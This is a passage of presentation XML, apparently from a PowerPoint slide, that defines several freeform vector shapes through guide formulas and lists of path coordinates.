                  <a:gd name="T22" fmla="*/ 435 w 814"/>
                  <a:gd name="T23" fmla="*/ 352 h 810"/>
                  <a:gd name="T24" fmla="*/ 435 w 814"/>
                  <a:gd name="T25" fmla="*/ 352 h 810"/>
                  <a:gd name="T26" fmla="*/ 125 w 814"/>
                  <a:gd name="T27" fmla="*/ 614 h 810"/>
                  <a:gd name="T28" fmla="*/ 0 w 814"/>
                  <a:gd name="T29" fmla="*/ 509 h 810"/>
                  <a:gd name="T30" fmla="*/ 262 w 814"/>
                  <a:gd name="T31" fmla="*/ 0 h 810"/>
                  <a:gd name="T32" fmla="*/ 372 w 814"/>
                  <a:gd name="T33" fmla="*/ 89 h 8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14" h="810">
                    <a:moveTo>
                      <a:pt x="372" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89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4" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6729413" y="1862138"/>
                <a:ext cx="203200" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 221 w 563"/>
                  <a:gd name="T1" fmla="*/ 43 h 558"/>
                  <a:gd name="T2" fmla="*/ 310 w 563"/>
                  <a:gd name="T3" fmla="*/ 6 h 558"/>
                  <a:gd name="T4" fmla="*/ 357 w 563"/>
                  <a:gd name="T5" fmla="*/ 0 h 558"/>
                  <a:gd name="T6" fmla="*/ 400 w 563"/>
                  <a:gd name="T7" fmla="*/ 11 h 558"/>
                  <a:gd name="T8" fmla="*/ 489 w 563"/>
                  <a:gd name="T9" fmla="*/ 69 h 558"/>
                  <a:gd name="T10" fmla="*/ 525 w 563"/>
                  <a:gd name="T11" fmla="*/ 117 h 558"/>
                  <a:gd name="T12" fmla="*/ 551 w 563"/>
                  <a:gd name="T13" fmla="*/ 158 h 558"/>
                  <a:gd name="T14" fmla="*/ 562 w 563"/>
                  <a:gd name="T15" fmla="*/ 200 h 558"/>
                  <a:gd name="T16" fmla="*/ 562 w 563"/>
                  <a:gd name="T17" fmla="*/ 247 h 558"/>
                  <a:gd name="T18" fmla="*/ 547 w 563"/>
                  <a:gd name="T19" fmla="*/ 290 h 558"/>
                  <a:gd name="T20" fmla="*/ 520 w 563"/>
                  <a:gd name="T21" fmla="*/ 337 h 558"/>
                  <a:gd name="T22" fmla="*/ 436 w 563"/>
                  <a:gd name="T23" fmla="*/ 437 h 558"/>
                  <a:gd name="T24" fmla="*/ 389 w 563"/>
                  <a:gd name="T25" fmla="*/ 484 h 558"/>
                  <a:gd name="T26" fmla="*/ 342 w 563"/>
                  <a:gd name="T27" fmla="*/ 521 h 558"/>
                  <a:gd name="T28" fmla="*/ 253 w 563"/>
                  <a:gd name="T29" fmla="*/ 557 h 558"/>
                  <a:gd name="T30" fmla="*/ 205 w 563"/>
                  <a:gd name="T31" fmla="*/ 557 h 558"/>
                  <a:gd name="T32" fmla="*/ 163 w 563"/>
                  <a:gd name="T33" fmla="*/ 547 h 558"/>
                  <a:gd name="T34" fmla="*/ 79 w 563"/>
                  <a:gd name="T35" fmla="*/ 489 h 558"/>
                  <a:gd name="T36" fmla="*/ 37 w 563"/>
                  <a:gd name="T37" fmla="*/ 447 h 558"/>
                  <a:gd name="T38" fmla="*/ 11 w 563"/>
                  <a:gd name="T39" fmla="*/ 400 h 558"/>
                  <a:gd name="T40" fmla="*/ 0 w 563"/>
                  <a:gd name="T41" fmla="*/ 358 h 558"/>
                  <a:gd name="T42" fmla="*/ 0 w 563"/>
                  <a:gd name="T43" fmla="*/ 316 h 558"/>
                  <a:gd name="T44" fmla="*/ 16 w 563"/>
                  <a:gd name="T45" fmla="*/ 274 h 558"/>
                  <a:gd name="T46" fmla="*/ 43 w 563"/>
                  <a:gd name="T47" fmla="*/ 227 h 558"/>
                  <a:gd name="T48" fmla="*/ 121 w 563"/>
                  <a:gd name="T49" fmla="*/ 127 h 558"/>
                  <a:gd name="T50" fmla="*/ 174 w 563"/>
                  <a:gd name="T51" fmla="*/ 80 h 558"/>
                  <a:gd name="T52" fmla="*/ 174 w 563"/>
                  <a:gd name="T53" fmla="*/ 284 h 558"/>
                  <a:gd name="T54" fmla="*/ 153 w 563"/>
                  <a:gd name="T55" fmla="*/ 311 h 558"/>
                  <a:gd name="T56" fmla="*/ 137 w 563"/>
                  <a:gd name="T57" fmla="*/ 337 h 558"/>
                  <a:gd name="T58" fmla="*/ 121 w 563"/>
                  <a:gd name="T59" fmla="*/ 384 h 558"/>
                  <a:gd name="T60" fmla="*/ 127 w 563"/>
                  <a:gd name="T61" fmla="*/ 400 h 558"/>
                  <a:gd name="T62" fmla="*/ 142 w 563"/>
                  <a:gd name="T63" fmla="*/ 421 h 558"/>
                  <a:gd name="T64" fmla="*/ 179 w 563"/>
                  <a:gd name="T65" fmla="*/ 437 h 558"/>
                  <a:gd name="T66" fmla="*/ 216 w 563"/>
                  <a:gd name="T67" fmla="*/ 431 h 558"/>
                  <a:gd name="T68" fmla="*/ 242 w 563"/>
                  <a:gd name="T69" fmla="*/ 415 h 558"/>
                  <a:gd name="T70" fmla="*/ 337 w 563"/>
                  <a:gd name="T71" fmla="*/ 337 h 558"/>
                  <a:gd name="T72" fmla="*/ 394 w 563"/>
                  <a:gd name="T73" fmla="*/ 268 h 558"/>
                  <a:gd name="T74" fmla="*/ 431 w 563"/>
                  <a:gd name="T75" fmla="*/ 216 h 558"/>
                  <a:gd name="T76" fmla="*/ 436 w 563"/>
                  <a:gd name="T77" fmla="*/ 195 h 558"/>
                  <a:gd name="T78" fmla="*/ 431 w 563"/>
                  <a:gd name="T79" fmla="*/ 158 h 558"/>
                  <a:gd name="T80" fmla="*/ 421 w 563"/>
                  <a:gd name="T81" fmla="*/ 143 h 558"/>
                  <a:gd name="T82" fmla="*/ 378 w 563"/>
                  <a:gd name="T83" fmla="*/ 121 h 558"/>
                  <a:gd name="T84" fmla="*/ 357 w 563"/>
                  <a:gd name="T85" fmla="*/ 127 h 558"/>
                  <a:gd name="T86" fmla="*/ 331 w 563"/>
                  <a:gd name="T87" fmla="*/ 132 h 558"/>
                  <a:gd name="T88" fmla="*/ 284 w 563"/>
                  <a:gd name="T89" fmla="*/ 174 h 558"/>
                  <a:gd name="T90" fmla="*/ 226 w 563"/>
                  <a:gd name="T91" fmla="*/ 227 h 558"/>
                  <a:gd name="T92" fmla="*/ 174 w 563"/>
                  <a:gd name="T93" fmla="*/ 284 h 5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563" h="558">
                    <a:moveTo>
                      <a:pt x="221" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="174" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="174" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="284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" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6834188" y="1976438"/>
                <a:ext cx="223837" cy="173037"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 509 w 621"/>
                  <a:gd name="T1" fmla="*/ 99 h 479"/>
                  <a:gd name="T2" fmla="*/ 452 w 621"/>
                  <a:gd name="T3" fmla="*/ 147 h 479"/>
                  <a:gd name="T4" fmla="*/ 452 w 621"/>
                  <a:gd name="T5" fmla="*/ 152 h 479"/>
                  <a:gd name="T6" fmla="*/ 452 w 621"/>
                  <a:gd name="T7" fmla="*/ 152 h 479"/>
                  <a:gd name="T8" fmla="*/ 499 w 621"/>
                  <a:gd name="T9" fmla="*/ 147 h 479"/>
                  <a:gd name="T10" fmla="*/ 536 w 621"/>
                  <a:gd name="T11" fmla="*/ 147 h 479"/>
                  <a:gd name="T12" fmla="*/ 536 w 621"/>
                  <a:gd name="T13" fmla="*/ 147 h 479"/>
                  <a:gd name="T14" fmla="*/ 556 w 621"/>
                  <a:gd name="T15" fmla="*/ 152 h 479"/>
                  <a:gd name="T16" fmla="*/ 573 w 621"/>
                  <a:gd name="T17" fmla="*/ 162 h 479"/>
                  <a:gd name="T18" fmla="*/ 588 w 621"/>
                  <a:gd name="T19" fmla="*/ 173 h 479"/>
                  <a:gd name="T20" fmla="*/ 604 w 621"/>
                  <a:gd name="T21" fmla="*/ 189 h 479"/>
                  <a:gd name="T22" fmla="*/ 604 w 621"/>
                  <a:gd name="T23" fmla="*/ 189 h 479"/>
                  <a:gd name="T24" fmla="*/ 614 w 621"/>
                  <a:gd name="T25" fmla="*/ 194 h 479"/>
                  <a:gd name="T26" fmla="*/ 614 w 621"/>
                  <a:gd name="T27" fmla="*/ 194 h 479"/>
                  <a:gd name="T28" fmla="*/ 620 w 621"/>
                  <a:gd name="T29" fmla="*/ 210 h 479"/>
                  <a:gd name="T30" fmla="*/ 520 w 621"/>
                  <a:gd name="T31" fmla="*/ 299 h 479"/>
                  <a:gd name="T32" fmla="*/ 520 w 621"/>
                  <a:gd name="T33" fmla="*/ 299 h 479"/>
                  <a:gd name="T34" fmla="*/ 504 w 621"/>
                  <a:gd name="T35" fmla="*/ 283 h 479"/>
                  <a:gd name="T36" fmla="*/ 504 w 621"/>
                  <a:gd name="T37" fmla="*/ 283 h 479"/>
                  <a:gd name="T38" fmla="*/ 494 w 621"/>
                  <a:gd name="T39" fmla="*/ 262 h 479"/>
                  <a:gd name="T40" fmla="*/ 494 w 621"/>
                  <a:gd name="T41" fmla="*/ 262 h 479"/>
                  <a:gd name="T42" fmla="*/ 462 w 621"/>
                  <a:gd name="T43" fmla="*/ 241 h 479"/>
                  <a:gd name="T44" fmla="*/ 462 w 621"/>
                  <a:gd name="T45" fmla="*/ 241 h 479"/>
                  <a:gd name="T46" fmla="*/ 446 w 621"/>
                  <a:gd name="T47" fmla="*/ 231 h 479"/>
                  <a:gd name="T48" fmla="*/ 426 w 621"/>
                  <a:gd name="T49" fmla="*/ 225 h 479"/>
                  <a:gd name="T50" fmla="*/ 426 w 621"/>
                  <a:gd name="T51" fmla="*/ 225 h 479"/>
                  <a:gd name="T52" fmla="*/ 409 w 621"/>
                  <a:gd name="T53" fmla="*/ 225 h 479"/>
                  <a:gd name="T54" fmla="*/ 389 w 621"/>
                  <a:gd name="T55" fmla="*/ 231 h 479"/>
                  <a:gd name="T56" fmla="*/ 389 w 621"/>
                  <a:gd name="T57" fmla="*/ 231 h 479"/>
                  <a:gd name="T58" fmla="*/ 368 w 621"/>
                  <a:gd name="T59" fmla="*/ 236 h 479"/>
                  <a:gd name="T60" fmla="*/ 347 w 621"/>
                  <a:gd name="T61" fmla="*/ 252 h 479"/>
                  <a:gd name="T62" fmla="*/ 95 w 621"/>
                  <a:gd name="T63" fmla="*/ 478 h 479"/>
                  <a:gd name="T64" fmla="*/ 0 w 621"/>
                  <a:gd name="T65" fmla="*/ 372 h 479"/>
                  <a:gd name="T66" fmla="*/ 415 w 621"/>
                  <a:gd name="T67" fmla="*/ 0 h 479"/>
                  <a:gd name="T68" fmla="*/ 509 w 621"/>
                  <a:gd name="T69" fmla="*/ 99 h 4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21" h="479">
                    <a:moveTo>
                      <a:pt x="509" y="99"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="99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6" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6913563" y="2030413"/>
                <a:ext cx="258762" cy="301625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 362 w 720"/>
                  <a:gd name="T1" fmla="*/ 357 h 836"/>
                  <a:gd name="T2" fmla="*/ 367 w 720"/>
                  <a:gd name="T3" fmla="*/ 362 h 836"/>
                  <a:gd name="T4" fmla="*/ 619 w 720"/>
                  <a:gd name="T5" fmla="*/ 341 h 836"/>
                  <a:gd name="T6" fmla="*/ 719 w 720"/>
                  <a:gd name="T7" fmla="*/ 467 h 836"/>
                  <a:gd name="T8" fmla="*/ 446 w 720"/>
                  <a:gd name="T9" fmla="*/ 478 h 836"/>
                  <a:gd name="T10" fmla="*/ 299 w 720"/>
                  <a:gd name="T11" fmla="*/ 835 h 836"/>
                  <a:gd name="T12" fmla="*/ 199 w 720"/>
                  <a:gd name="T13" fmla="*/ 709 h 836"/>
                  <a:gd name="T14" fmla="*/ 305 w 720"/>
                  <a:gd name="T15" fmla="*/ 473 h 836"/>
                  <a:gd name="T16" fmla="*/ 220 w 720"/>
                  <a:gd name="T17" fmla="*/ 478 h 836"/>
                  <a:gd name="T18" fmla="*/ 89 w 720"/>
                  <a:gd name="T19" fmla="*/ 577 h 836"/>
                  <a:gd name="T20" fmla="*/ 0 w 720"/>
                  <a:gd name="T21" fmla="*/ 467 h 836"/>
                  <a:gd name="T22" fmla="*/ 582 w 720"/>
                  <a:gd name="T23" fmla="*/ 0 h 836"/>
                  <a:gd name="T24" fmla="*/ 672 w 720"/>
                  <a:gd name="T25" fmla="*/ 116 h 836"/>
                  <a:gd name="T26" fmla="*/ 362 w 720"/>
                  <a:gd name="T27" fmla="*/ 357 h 8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20" h="836">
                    <a:moveTo>
                      <a:pt x="362" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="367" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="357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7" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7096125" y="2289175"/>
                <a:ext cx="271463" cy="239713"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 752"/>
                  <a:gd name="T1" fmla="*/ 368 h 668"/>
                  <a:gd name="T2" fmla="*/ 131 w 752"/>
                  <a:gd name="T3" fmla="*/ 399 h 668"/>
                  <a:gd name="T4" fmla="*/ 131 w 752"/>
                  <a:gd name="T5" fmla="*/ 436 h 668"/>
                  <a:gd name="T6" fmla="*/ 152 w 752"/>
                  <a:gd name="T7" fmla="*/ 483 h 668"/>
                  <a:gd name="T8" fmla="*/ 200 w 752"/>
                  <a:gd name="T9" fmla="*/ 520 h 668"/>
                  <a:gd name="T10" fmla="*/ 237 w 752"/>
                  <a:gd name="T11" fmla="*/ 525 h 668"/>
                  <a:gd name="T12" fmla="*/ 273 w 752"/>
                  <a:gd name="T13" fmla="*/ 510 h 668"/>
                  <a:gd name="T14" fmla="*/ 310 w 752"/>
                  <a:gd name="T15" fmla="*/ 478 h 668"/>
                  <a:gd name="T16" fmla="*/ 326 w 752"/>
                  <a:gd name="T17" fmla="*/ 441 h 668"/>
                  <a:gd name="T18" fmla="*/ 326 w 752"/>
                  <a:gd name="T19" fmla="*/ 394 h 668"/>
                  <a:gd name="T20" fmla="*/ 299 w 752"/>
                  <a:gd name="T21" fmla="*/ 279 h 668"/>
                  <a:gd name="T22" fmla="*/ 294 w 752"/>
                  <a:gd name="T23" fmla="*/ 195 h 668"/>
                  <a:gd name="T24" fmla="*/ 315 w 752"/>
                  <a:gd name="T25" fmla="*/ 126 h 668"/>
                  <a:gd name="T26" fmla="*/ 362 w 752"/>
                  <a:gd name="T27" fmla="*/ 69 h 668"/>
                  <a:gd name="T28" fmla="*/ 441 w 752"/>
                  <a:gd name="T29" fmla="*/ 21 h 668"/>
                  <a:gd name="T30" fmla="*/ 567 w 752"/>
                  <a:gd name="T31" fmla="*/ 5 h 668"/>
                  <a:gd name="T32" fmla="*/ 641 w 752"/>
                  <a:gd name="T33" fmla="*/ 48 h 668"/>
                  <a:gd name="T34" fmla="*/ 704 w 752"/>
                  <a:gd name="T35" fmla="*/ 121 h 668"/>
                  <a:gd name="T36" fmla="*/ 745 w 752"/>
                  <a:gd name="T37" fmla="*/ 205 h 668"/>
                  <a:gd name="T38" fmla="*/ 751 w 752"/>
                  <a:gd name="T39" fmla="*/ 284 h 668"/>
                  <a:gd name="T40" fmla="*/ 725 w 752"/>
                  <a:gd name="T41" fmla="*/ 357 h 668"/>
                  <a:gd name="T42" fmla="*/ 641 w 752"/>
                  <a:gd name="T43" fmla="*/ 431 h 668"/>
                  <a:gd name="T44" fmla="*/ 598 w 752"/>
                  <a:gd name="T45" fmla="*/ 284 h 668"/>
                  <a:gd name="T46" fmla="*/ 625 w 752"/>
                  <a:gd name="T47" fmla="*/ 252 h 668"/>
                  <a:gd name="T48" fmla="*/ 625 w 752"/>
                  <a:gd name="T49" fmla="*/ 199 h 668"/>
                  <a:gd name="T50" fmla="*/ 598 w 752"/>
                  <a:gd name="T51" fmla="*/ 163 h 668"/>
                  <a:gd name="T52" fmla="*/ 572 w 752"/>
                  <a:gd name="T53" fmla="*/ 142 h 668"/>
                  <a:gd name="T54" fmla="*/ 541 w 752"/>
                  <a:gd name="T55" fmla="*/ 142 h 668"/>
                  <a:gd name="T56" fmla="*/ 494 w 752"/>
                  <a:gd name="T57" fmla="*/ 158 h 668"/>
                  <a:gd name="T58" fmla="*/ 451 w 752"/>
                  <a:gd name="T59" fmla="*/ 199 h 668"/>
                  <a:gd name="T60" fmla="*/ 446 w 752"/>
                  <a:gd name="T61" fmla="*/ 231 h 668"/>
                  <a:gd name="T62" fmla="*/ 473 w 752"/>
                  <a:gd name="T63" fmla="*/ 399 h 668"/>
                  <a:gd name="T64" fmla="*/ 473 w 752"/>
                  <a:gd name="T65" fmla="*/ 483 h 668"/>
                  <a:gd name="T66" fmla="*/ 462 w 752"/>
